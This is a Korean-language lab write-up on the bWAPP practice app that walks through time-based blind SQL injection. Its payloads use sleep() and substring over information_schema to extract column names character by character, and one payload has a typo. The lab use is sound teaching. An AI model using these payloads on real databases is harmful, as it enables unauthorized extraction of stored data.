owasp 실습(bwapp) -2 (sql injection blind time based)

blind time based





참거짓 반응보기-----------------------


' or 1=1#





' or 1=2#




필터링되있기 떄문에 참거짓을 확인할수가없다.












이러한 조건을 준다.

sleep()= mysql 에서 사용하는 내장 함수이다. 사용자가 지정한 시간만큼 실행 대기\



참 반응을 주면


' or 1=1 and sleep(1)#


위에   빙글빙글 도는 것처럼 대기하는 것을  알수있다.






반대로 거짓반응을 보면


' or 1=2 and sleep(1)#




거짓반응이되서 sleep이 실행이되지않으니까

참일떄만 대기를 하는걸 알수있다.











1) 현재 접속중인 DB의 users 테이블의 첫번쨰 컬럼에서 두번쨰 문자 를 찾자.




limit 0,1 

0은 첫번쨰 컬럼

1은 행을 의미

limit 0,2

0은 첫번쨰컬럼

2는 행을 의미


substring (2,1) 하면

두번쨰 문자의 한 글자만 나오게한다










' or 1=1 and sleep(1) and

substring((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)<'a'#


이게참이면 대문자

(반응이없으므로 대문자는아니다) (소문자라는 뜻이다)








' or 1=1 and sleep(1) and substiring((select column_name from information_schema.columns where table_name='users' limit 0,1),2,1)>'a'#



빙글빙글도는 반응이나온다.












' or '1'='1' and substring((select column_name from

information_schema.columns where table_name = 'users' limit 0, 1),2 ,1) > 'a' and sleep(1)#



(빙글빙글 돌면 참이라는 소리이다!

이방식으로 여러번 참과 거짓으로 글자의 범위를판단한다)








' or '1'='1' and substring((select column_name from

information_schema.columns where table_name = 'users' limit 0, 1),2 ,1)='d' and sleep(1)#



(빙글빙글 돌고있으면 그게 참!

users 테이블의 첫번쨰 컬럼에서 두번쨰 문자는 d이다.)